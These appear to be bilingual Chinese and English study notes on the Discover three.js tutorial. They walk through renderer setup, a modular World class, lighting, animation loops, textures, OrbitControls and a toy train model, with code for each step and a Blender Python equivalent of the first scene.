        WebGLRenderer 是 Three.js 中用于在网页上渲染 3D 图形的渲染器。它使用 WebGL API 来绘制场景和模型。默认情况下,这个渲染器会创建一个 <canvas> 元素,用于显示渲染的 3D 图形。

        • renderer.setSize(container.clientWidth, container.clientHeight);:使用setSize方法设置渲染器的大小,以适应容器(通常是某个 HTML 元素)的尺寸。

          container.clientWidthcontainer.clientHeight 分别获取容器的宽度和高度,确保渲染的 3D 场景能够充满整个容器,不会出现拉伸或压缩的情况。

        • renderer.setPixelRatio(window.devicePixelRatio);

          通过 setPixelRatio 方法设置渲染器的像素比,使用 window.devicePixelRatio 来适配不同设备的屏幕分辨率。这样可以确保在具有高像素密度的显示屏(如 Retina 屏幕)上也能获得清晰的渲染效果。

        • container.appendChild(renderer.domElement);

          渲染器创建的 <canvas> 元素可以通过 renderer.domElement 访问。这行代码将这个 <canvas> 元素添加到之前指定的 HTML 容器中,使得渲染的 3D 场景能够显示在网页上的该容器内。

        • renderer.render(scene, camera);

          最后,使用 render 方法渲染场景。这个方法接受两个参数:scene(场景)和 camera(摄像机)。场景包含了所有要渲染的 3D 对象,而摄像机定义了观察场景的视角。调用这个方法时,Three.js 会根据提供的场景和摄像机参数,计算并绘制最终的图像到 <canvas> 元素上。

    1
    2
    3
    4
    5
    6
    7
    const renderer = new WebGLRenderer();
    renderer.setSize(container.clientWidth, container.clientHeight);
    renderer.setPixelRatio(window.devicePixelRatio);

    container.appendChild(renderer.domElement);

    renderer.render(scene, camera);

    演示

    我想,这段代码在 Blender 里的实现:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    import bpy
    import numpy as np

    # 删除默认场景中的所有物体
    bpy.ops.object.select_all(action='SELECT')
    bpy.ops.object.delete(use_global=False)

    # 设置使用 Cycles 渲染引擎,也可以设置为'Eevee'
    bpy.context.scene.render.engine = 'CYCLES'

    # 获取当前世界
    world = bpy.data.worlds['World']
    # 确保使用节点
    world.use_nodes = True
    # 获取节点树和节点
    nodes = world.node_tree.nodes
    # 清除所有现有节点
    nodes.clear()
    # 创建一个新的背景节点
    bg_node = nodes.new(type='ShaderNodeBackground')
    # 设置背景颜色为天蓝色
    bg_node.inputs[0].default_value = (135/255, 206/235, 235/255, 1) # RGBA
    # 创建一个世界输出节点
    world_output_node = nodes.new(type='ShaderNodeOutputWorld')
    # 链接背景节点到世界输出节点
    links = world.node_tree.links
    link = links.new(bg_node.outputs[0], world_output_node.inputs[0])

    # 创建一个立方体
    bpy.ops.mesh.primitive_cube_add(size=2, location=(0, 0, 0))
    # 获取刚刚添加的立方体对象
    cube = bpy.context.object
    # 创建一个新的材质
    mat = bpy.data.materials.new(name="CubeMaterial")
    # 设置材质的基础颜色
    mat.diffuse_color = (68/255, 170/255, 136/255, 1) # RGB + Alpha
    # 将材质分配给立方体
    if not cube.data.materials:
    cube.data.materials.append(mat)
    else:
    cube.data.materials[0] = mat

    # 添加摄像机并直接获取引用
    bpy.ops.object.camera_add(location=(0, 0, 10))
    camera = bpy.context.object # 获取刚刚添加的摄像机对象

    # 设置摄像机的 fov, near 和 far 参数
    camera.data.angle = 35 * (np.pi / 180) # Blender 中使用弧度,Three.js 使用度
    camera.data.clip_start = 0.1
    camera.data.clip_end = 100

    # 摄像机位置已经在添加时设置,这里不需要重复设置
    # camera.location = (0, 0, 10)

    # 设置渲染分辨率
    bpy.context.scene.render.resolution_x = 1848
    bpy.context.scene.render.resolution_y = 1206
    bpy.context.scene.render.resolution_percentage = 100

    Blender

    1.3 介绍世界应用程序

    这章主要是将之前的代码模块化。

    模块化

    获取 container,导入 World.js

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import { World } from './World/world.js';

    function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // 1. Create an instance of the World app
    const world = new World(container);

    // 2. Render the scene
    world.render();
    }

    // call main to start the app
    main();

    把之前定义摄像机、创建立方体、设置场景环境、渲染器、窗口适应之类的全扔进去。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createScene } from './components/scene.js';

    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/resizer.js';

    // These variables are module-scoped: we cannot access them
    // from outside the module
    let camera;
    let renderer;
    let scene;

    class World {
    constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();

    scene.add(cube);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }
    }

    export { World };

    渲染器系统:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import { WebGLRenderer } from 'three';

    function createRenderer() {
    const renderer = new WebGLRenderer();

    return renderer;
    }

    export { createRenderer };

    场景组件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import { Color, Scene } from 'three';

    function createScene() {
    const scene = new Scene();

    scene.background = new Color('skyblue');

    return scene;
    }

    export { createScene };

    相机组件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import { PerspectiveCamera } from 'three';

    function createCamera() {
    const camera = new PerspectiveCamera(
    35, // fov = Field Of View
    1, // aspect ratio (dummy value)
    0.1, // near clipping plane
    100, // far clipping plane
    );

    // move the camera back so we can view the scene
    camera.position.set(0, 0, 10);

    return camera;
    }

    export { createCamera };

    立方体组件,它包括创建 几何体、材质和 网格。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    import { BoxBufferGeometry, Mesh, MeshBasicMaterial } from 'three';

    function createCube() {
    // create a geometry
    const geometry = new BoxBufferGeometry(2, 2, 2);

    // create a default (white) Basic material
    const material = new MeshBasicMaterial();

    // create a Mesh containing the geometry and material
    const cube = new Mesh(geometry, material);

    return cube;
    }

    export { createCube };

    使得场景可以占据整个窗口的大小:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    class Resizer {
    constructor(container, camera, renderer) {
    // Set the camera's aspect ratio
    camera.aspect = container.clientWidth / container.clientHeight;

    // update the camera's frustum
    camera.updateProjectionMatrix();

    // update the size of the renderer AND the canvas
    renderer.setSize(container.clientWidth, container.clientHeight);

    // set the pixel ratio (for mobile devices)
    renderer.setPixelRatio(window.devicePixelRatio);
    }
    }

    1.4 基于物理的渲染和照明

    three.js 也是使用**基于物理的渲染 (PBR)**的。

    根据之前模块化后的程序,继续修改:

    告诉渲染器启动基于物理的渲染。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    function createRenderer() {
    const renderer = new WebGLRenderer({ antialias: true });

    renderer.physicallyCorrectLights = true;

    return renderer;
    }

    export { createRenderer };

    定义一个灯光:

    • 光强设为 $8$
    • 位置在 $(10, 10, 10)$,照向原点
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import { DirectionalLight } from 'three';

    function createLights() {
    // Create a directional light
    const light = new DirectionalLight('white', 8);

    // move the light right, up, and towards us
    light.position.set(10, 10, 10);

    return light;
    }

    export { createLights };

    scene.add() 里给场景添加光源!

    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createScene } from './components/scene.js';
    import { createLights } from './components/lights.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/resizer.js';

    // These variables are module-scoped: we cannot access them
    // from outside the module
    let camera;
    let renderer;
    let scene;

    class World {
    constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }
    }

    export { World };

Demo

1.5 Transformations, Coordinate Systems, and the Scene Graph

Hmm, this works much like it does in Unity.

In cube.js we can modify the cube's position, rotation, and scale:

    import {
    BoxBufferGeometry,
    MathUtils,
    Mesh,
    MeshStandardMaterial,
    } from 'three';

    function createCube() {
    const geometry = new BoxBufferGeometry(2, 2, 2);

    const material = new MeshStandardMaterial({ color: 'purple' });

    const cube = new Mesh(geometry, material);

    cube.position.x = -0.5;
    cube.position.y = -0.1;
    cube.position.z = 1;

    // equivalent to:
    // cube.position.set(-0.5, -0.1, 1);

    cube.scale.x = 1.25;
    cube.scale.y = 0.25;
    cube.scale.z = 0.5;

    // equivalent to:
    // cube.scale.set(1.25, 0.25, 0.5);

    // to rotate using degrees, they must
    // first be converted to radians
    cube.rotation.x = MathUtils.degToRad(-60);
    cube.rotation.y = MathUtils.degToRad(-45);
    cube.rotation.z = MathUtils.degToRad(60);

    return cube;
    }

    export { createCube };

Objects can also be placed inside other objects, as their children:

Nesting dolls!

    scene.add(mesh);

    // the children array contains the mesh we added
    scene.children; // -> [mesh]

    // now, add a light:
    scene.add(light);

    // the children array now contains both the mesh and the light
    scene.children; // -> [mesh, light];

    // now you can access the mesh and light using array indices
    scene.children[0]; // -> mesh
    scene.children[1]; // -> light

1.6 Making Our Scene Responsive (and Dealing with Jaggies)

Anti-aliasing

Enable anti-aliasing in renderer.js:

    const renderer = new WebGLRenderer({ antialias: true });

Handling browser window resizing seamlessly

Modify resizer.js:

• Wrap setSize in a function so that when the user resizes the window (triggering window.addEventListener('resize', () => {});), setSize() runs again.
• Define an onResize() hook so callers can override it.
    const setSize = (container, camera, renderer) => {
    camera.aspect = container.clientWidth / container.clientHeight;
    camera.updateProjectionMatrix();

    renderer.setSize(container.clientWidth, container.clientHeight);
    renderer.setPixelRatio(window.devicePixelRatio);
    };

    class Resizer {
    constructor(container, camera, renderer) {
    // set initial size on load
    setSize(container, camera, renderer);

    window.addEventListener('resize', () => {
    // set the size again if a resize occurs
    setSize(container, camera, renderer);
    // perform any custom actions
    this.onResize();
    });
    }

    onResize() { }
    }

    export { Resizer };

Modify World.js:

• Override the onResize() logic so the frame is re-rendered when the window changes:
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createScene } from './components/scene.js';
    import { createLights } from './components/lights.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/resizer.js';

    let camera;
    let renderer;
    let scene;

    class World {
    constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    resizer.onResize = () => {
    this.render();
    };
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }
    }

    export { World };

Demo

1.7 The Animation Loop

Create a Loop.js for the loop:

• constructor():
  • camera: the camera.
  • scene: the scene.
  • renderer: the renderer.
  • updatables: the list of objects to update inside the loop.
• start(): starts the loop with this.renderer.setAnimationLoop(() => {});.
  • this.tick(); advances the timer.
  • this.renderer.render(this.scene, this.camera); renders a frame on every iteration.
• stop(): clears the loop: this.renderer.setAnimationLoop(null);.
• tick():
  • const delta = clock.getDelta(); measures how long the previous frame took to render (in seconds).
  • It then calls tick() on every object in this.updatables (similar to Update() in Unity).
    import { Clock } from "three";

    const clock = new Clock();

    class Loop {
    constructor(camera, scene, renderer) {
    this.camera = camera;
    this.scene = scene;
    this.renderer = renderer;
    this.updatables = [];
    }

    start() {
    this.renderer.setAnimationLoop(() => {
    // tell every animated object to tick forward one frame
    this.tick();

    // render a frame
    this.renderer.render(this.scene, this.camera);
    });
    }

    stop() {
    this.renderer.setAnimationLoop(null);
    }

    tick() {
    // only call the getDelta function once per frame!
    const delta = clock.getDelta();

    // console.log(
    // `The last frame rendered in ${delta * 1000} milliseconds`,
    // );

    for (const object of this.updatables) {
    object.tick(delta);
    }
    }
    }

    export { Loop };
• import { Loop } from './systems/Loop.js'; imports the corresponding JS.
• let loop; and loop = new Loop(camera, scene, renderer); create the loop as a module-scoped variable, like camera, renderer, and scene, because we don't want it to be accessible from outside the World class.
• loop.updatables.push(cube); pushes cube into loop.updatables so it is updated by the loop.
• start() and stop() simply delegate to the loop's start() and stop().
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

Change the rendering entry point to world.start();:

    import { World } from './World/World.js';

    function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // create a new world
    const world = new World(container);

    // draw the scene
    world.start();
    }

    main();

Define cube.tick: rotate $30^\circ$ per second.

    import { BoxGeometry, Mesh, MeshStandardMaterial, MathUtils } from 'three';

    function createCube() {
    // create a geometry
    const geometry = new BoxGeometry(2, 2, 2);

// create a purple Standard material
const material = new MeshStandardMaterial({ color: "purple" });

    // create a Mesh containing the geometry and material
    const cube = new Mesh(geometry, material);

    cube.rotation.set(-0.5, -0.1, 0.8);

    const radiansPerSecond = MathUtils.degToRad(30);
    // this method will be called once per frame
    cube.tick = (delta) => {
    // increase the cube's rotation each frame
    cube.rotation.z += radiansPerSecond * delta;
    cube.rotation.x += radiansPerSecond * delta;
    cube.rotation.y += radiansPerSecond * delta;
    };

    return cube;
    }

    export { createCube };

Demo

1.8 Texture Mapping

Apply a texture map to the cube:

Textured cube

Modify components/cube.js:

• Define createMaterial() and move the material-related code into its own function.
  • const textureLoader = new TextureLoader(); creates a texture loader.
  • const texture = textureLoader.load('./assets/textures/uv-test-bw.png',); loads the texture in a form the material class can read.
  • const material = new MeshStandardMaterial({map: texture,}); defines the material.
    import { BoxGeometry, Mesh, MeshStandardMaterial, MathUtils, TextureLoader } from 'three';

    function createMaterial() {
    // create a texture loader.
    const textureLoader = new TextureLoader();
    // load a texture
    const texture = textureLoader.load(
    './assets/textures/uv-test-bw.png',
    );
    // create a "standard" material using
    // the texture we just loaded as a color map
    const material = new MeshStandardMaterial({
    map: texture,
    });

    return material;
    }

    function createCube() {
    // create a geometry
    const geometry = new BoxGeometry(2, 2, 2);

// create the textured Standard material
const material = createMaterial();

    // create a Mesh containing the geometry and material
    const cube = new Mesh(geometry, material);

    cube.rotation.set(-0.5, -0.1, 0.8);

    const radiansPerSecond = MathUtils.degToRad(30);
    // this method will be called once per frame
    cube.tick = (delta) => {
    // increase the cube's rotation each frame
    cube.rotation.z += radiansPerSecond * delta;
    cube.rotation.x += radiansPerSecond * delta;
    cube.rotation.y += radiansPerSecond * delta;
    };

    return cube;
    }

    export { createCube };

Demo

1.9 Extending three.js with a Camera Controls Plugin

This section uses a new plugin: three/examples/jsm/controls/OrbitControls.js.

OrbitControls is a helper controller in the three.js library that lets the user rotate, zoom, and pan the camera with the mouse for interactive viewing of the scene.

A new plugin!

If you load it locally, you also need to adjust the import logic inside OrbitControls.js:

    import {
    EventDispatcher,
    MOUSE,
    Quaternion,
    Spherical,
    TOUCH,
    Vector2,
    Vector3,
    Plane,
    Ray,
    MathUtils
    } from '../../../build/three.module.js';
• const controls = new OrbitControls(camera, canvas); creates a new OrbitControls instance from the camera and the canvas element.
• controls.enableDamping = true; enables damping (inertia) so camera movement feels smoother and more natural. Damping requires the controls to be updated continuously from the animation loop.
• controls.tick = () => controls.update(); adds a tick method to the controls that simply calls controls.update(). When damping or auto-rotation is enabled, the controls must be updated every frame to animate smoothly, and calling this tick method from the main animation loop achieves exactly that.
    import { OrbitControls } from 'three/examples/jsm/controls/OrbitControls.js';

    function createControls(camera, canvas) {
    const controls = new OrbitControls(camera, canvas);

    // damping and auto rotation require
    // the controls to be updated each frame

    // this.controls.autoRotate = true;
    controls.enableDamping = true;

    controls.tick = () => controls.update();

    return controls;
    }

    export { createControls };
• import { createControls } from './systems/controls.js'; imports controls.js.
• const controls = createControls(camera, renderer.domElement); passes the arguments into createControls() to activate the helper controller.
• loop.updatables.push(controls); keeps the controls updating with the scene.
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);

    const cube = createCube();
    const light = createLights();

    loop.updatables.push(controls);

    // stop the cube's animation
    // loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

Demo

Rendering on demand

If you use only the camera controls plugin and no animation, rendering on demand saves resources.

• controls.addEventListener('change', () => {renderer.render(scene, camera);}); registers an event listener so a new frame is rendered whenever the user moves the camera (instead of rendering in a continuous loop).
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    // import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    // let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    // loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    controls.addEventListener('change', () => {
    renderer.render(scene, camera);
    });

    const cube = createCube();
    const light = createLights();

    // loop.updatables.push(controls);

    // stop the cube's animation
    // loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    // start() {
    // loop.start();
    // }

    // stop() {
    // loop.stop();
    // }
    }

    export { World };

Remove the animation loop:

    import { World } from './World/World.js';

    function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // create a new world
    const world = new World(container);

    // draw the scene
    world.render();
    }

    main();

Demo

OrbitControls configuration

OrbitControls can be configured by setting its properties: Extending three.js with a camera controls plugin | Discover three.js (discoverthreejs.com)
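
A few commonly used settings, as a sketch (these property names come from the OrbitControls documentation; the values here are arbitrary examples):

// smooth out camera movement; requires controls.update() every frame
controls.enableDamping = true;
controls.dampingFactor = 0.05;

// orbit the scene slowly even without user input
controls.autoRotate = true;
controls.autoRotateSpeed = 1.0;

// limit how close and how far the camera can zoom
controls.minDistance = 5;
controls.maxDistance = 50;

// keep the camera from dipping below the ground plane
controls.maxPolarAngle = Math.PI / 2;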

1.10 Ambient Lighting: Illumination from Every Direction

Previously the back of the cube was completely black, because the scene lacked ambient light.

AmbientLight is the cheapest way to fake indirect lighting in three.js. This kind of light adds a constant amount of illumination to every object in the scene, from all directions.

• const ambientLight = new AmbientLight('white', 2);

Light from a HemisphereLight fades between a sky color at the top of the scene and a ground color at the bottom. Like AmbientLight, this light makes no attempt at physical accuracy; instead, HemisphereLight is based on the observation that in many settings where you find humans, the brightest light comes from the top of the scene, while light reflected from the ground is usually dimmer.

• const ambientLight = new HemisphereLight('white', 'darkslategrey', 5, ); creates a HemisphereLight as the ambient light
  • sky color: white
  • ground color: darkslategrey
  • intensity: 5
• return { ambientLight, mainLight }; returns the ambient light and the main light.
    import { AmbientLight, DirectionalLight, HemisphereLight } from 'three';

    function createLights() {
    const ambientLight = new HemisphereLight(
    'white', // bright sky color
    'darkslategrey', // dim ground color
    5, // intensity
    );

    const mainLight = new DirectionalLight('white', 5);
    mainLight.position.set(10, 10, 10);

    return { ambientLight, mainLight };
    }

    export { createLights };
• const { ambientLight, mainLight } = createLights(); destructures the light objects the function returns. (Could this be changed to a list to reduce coupling?)
• scene.add(ambientLight, mainLight, cube); adds these lights and the cube to the scene.
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);

    const cube = createCube();
    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight, cube);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

Demo

1.11 Organizing Your Scene

The original tutorial uses SphereBufferGeometry, which appears to be deprecated on my setup and should now be SphereGeometry. (It creates sphere-shaped geometry.)

• const group = new Group(); creates a new group object using the Group class. The group will hold all the spheres, but is itself invisible (it's just an empty node).

• const geometry = new SphereGeometry(0.25, 16, 16); creates the sphere geometry: radius 0.25, with 16 width segments and 16 height segments.

• group.add(protoSphere); adds const protoSphere = new Mesh(geometry, material); as a child of the group.

• for (let i = 0; i < 1; i += 0.05) {}: creates more spheres.

  • const sphere = protoSphere.clone(); clones protoSphere; the clone gets the same position, rotation, and scale as the original.

    The geometry and material are not cloned; they are shared. If we make any change to the shared material, for example changing its color, all the cloned meshes change together with the original. The same applies to changes made to the geometry. (Much like Unity here, too; see the sketch after the code block below.)

    You can give a clone a brand-new material, and the original material is unaffected.

  • Adjust the new mesh's transform.

  • group.add(sphere); adds the resulting mesh to the group.

• group.scale.multiplyScalar(2); scales the entire group up by a factor of two.

• const radiansPerSecond = MathUtils.degToRad(30); prepares to rotate the whole group $30^\circ$ per second.
• group.tick = (delta) => {group.rotation.z -= delta * radiansPerSecond;}; applies the animation.
    import {
    SphereGeometry,
    Group,
    MathUtils,
    Mesh,
    MeshStandardMaterial,
    } from 'three';

    function createMeshGroup() {
    // a group holds other objects
    // but cannot be seen itself
    const group = new Group();

    const geometry = new SphereGeometry(0.25, 16, 16);

    const material = new MeshStandardMaterial({
    color: 'indigo',
    });

    const protoSphere = new Mesh(geometry, material);

    // add the protoSphere to the group
    group.add(protoSphere);

    // create twenty clones of the protoSphere
    // and add each to the group
    for (let i = 0; i < 1; i += 0.05) {
    const sphere = protoSphere.clone();

    // position the spheres on around a circle
    sphere.position.x = Math.cos(2 * Math.PI * i);
    sphere.position.y = Math.sin(2 * Math.PI * i);

    sphere.scale.multiplyScalar(0.01 + i);

    group.add(sphere);
    }

    // every sphere inside the group will be scaled
    group.scale.multiplyScalar(2);

    const radiansPerSecond = MathUtils.degToRad(30);

    // each frame, rotate the entire group of spheres
    group.tick = (delta) => {
    group.rotation.z -= delta * radiansPerSecond;
    };

    return group;
    }

    export { createMeshGroup };
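
A minimal sketch of the sharing behavior described above, reusing protoSphere from the code block:

// changing the shared material re-tints the original AND every clone
protoSphere.material.color.set('crimson');

// but a clone can be handed a brand-new material without affecting the rest
const special = protoSphere.clone();
special.material = new MeshStandardMaterial({ color: 'gold' });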

Swap the earlier cube for meshGroup:

    import { createCamera } from './components/camera.js';
    import { createLights } from './components/lights.js';
    import { createMeshGroup } from './components/meshGroup.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    const { ambientLight, mainLight } = createLights();
    const meshGroup = createMeshGroup();

    loop.updatables.push(controls, meshGroup);
    scene.add(ambientLight, mainLight, meshGroup);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

Demo

1.12 Getting Creative with Built-in Geometries

The file structure is as follows:

• components/Train/: a train class
  • Train.js: assembles the train and animates the wheels.
  • geometries.js: defines the geometries that make up the train.
  • materials.js: defines the train's materials.
  • meshes.js: sets the transform of each train component.
• components/helpers.js: displays the coordinate system in the scene.

File structure

• import {createAxesHelper, createGridHelper,} from './components/helpers.js'; and import { Train } from './components/Train/Train.js'; import the relevant modules.
• const train = new Train();, loop.updatables.push(controls, train);, and scene.add(ambientLight, mainLight, train); create the train class, hook up its animation, and place it in the scene.
• scene.add(createAxesHelper(), createGridHelper()); shows the coordinate axes in the scene.
    import { createCamera } from './components/camera.js';
    import {
    createAxesHelper,
    createGridHelper,
    } from './components/helpers.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';
    import { Train } from './components/Train/Train.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    const { ambientLight, mainLight } = createLights();
    const train = new Train();

    loop.updatables.push(controls, train);
    scene.add(ambientLight, mainLight, train);

    const resizer = new Resizer(container, camera, renderer);

    scene.add(createAxesHelper(), createGridHelper());
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };
• function createAxesHelper() {}: creates the axes helper.
  • const helper = new AxesHelper(3); shows axes of length $3$.
  • helper.position.set(-3.5, 0, -3.5); places the axes at $(-3.5, 0, -3.5)$.
• function createGridHelper() {}: creates the grid.
  • const helper = new GridHelper(6); creates a grid of size $6$ in the $xOz$ plane (GridHelper defaults to 10 divisions; for cells of size $1$, see the variant after the code block below).
    import { AxesHelper, GridHelper } from 'three';

    function createAxesHelper() {
    const helper = new AxesHelper(3);
    helper.position.set(-3.5, 0, -3.5);
    return helper;
    }

    function createGridHelper() {
    const helper = new GridHelper(6);
    return helper;
    }

    export { createAxesHelper, createGridHelper };
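
For the cells of size $1$ mentioned above, GridHelper's second parameter sets the division count explicitly (a minimal variant of the helper above):

// a grid of size 6 split into 6 divisions, giving cells of size 1
const helper = new GridHelper(6, 6);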

• Import createMeshes from ./meshes.js and attach those meshes under the train's own node.
• tick(delta) {} spins the wheels at $24^\circ$ per second.
    import { Group, MathUtils } from 'three';

    import { createMeshes } from './meshes.js';

    const wheelSpeed = MathUtils.degToRad(24);

    class Train extends Group {
    constructor() {
    super();

    this.meshes = createMeshes();

    this.add(
    this.meshes.nose,
    this.meshes.cabin,
    this.meshes.chimney,
    this.meshes.smallWheelRear,
    this.meshes.smallWheelCenter,
    this.meshes.smallWheelFront,
    this.meshes.bigWheel,
    );
    }

    tick(delta) {
    this.meshes.bigWheel.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelRear.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelCenter.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelFront.rotation.y += wheelSpeed * delta;
    }
    }

    export { Train };

The original tutorial uses BoxBufferGeometry and CylinderBufferGeometry, which appear to be deprecated; they should be BoxGeometry and CylinderGeometry respectively.

• const cabin = new BoxGeometry(2, 2.25, 1.5); creates a box geometry; the parameters 2, 2.25, 1.5 are the box's width, height, and depth.
• const wheel = new CylinderGeometry(0.4, 0.4, 1.75, 16); creates a cylinder geometry.
  • The first two parameters, 0.4 and 0.4, are the cylinder's top and bottom radii.
  • The third parameter, 1.75, is the cylinder's height.
  • The fourth parameter, 16, sets the number of segments around the cylinder; higher values make it look smoother.
  • const chimney = new CylinderGeometry(0.3, 0.1, 0.5); works the same way (different top and bottom radii create a cone shape).
    import { BoxGeometry, CylinderGeometry } from 'three';

    function createGeometries() {
    const cabin = new BoxGeometry(2, 2.25, 1.5);

    const nose = new CylinderGeometry(0.75, 0.75, 3, 12);

    // we can reuse a single cylinder geometry for all 4 wheels
    const wheel = new CylinderGeometry(0.4, 0.4, 1.75, 16);

    // different values for the top and bottom radius creates a cone shape
    const chimney = new CylinderGeometry(0.3, 0.1, 0.5);

    return {
    cabin,
    nose,
    wheel,
    chimney,
    };
    }

    export { createGeometries };
• new MeshStandardMaterial({}); creates a standard material.
  • flatShading: true, enables flat shading.
    import { MeshStandardMaterial } from 'three';

    function createMaterials() {
    const body = new MeshStandardMaterial({
    color: 'firebrick',
    flatShading: true,
    });

    const detail = new MeshStandardMaterial({
    color: 'darkslategray',
    flatShading: true,
    });

    return { body, detail };
    }

    export { createMaterials };
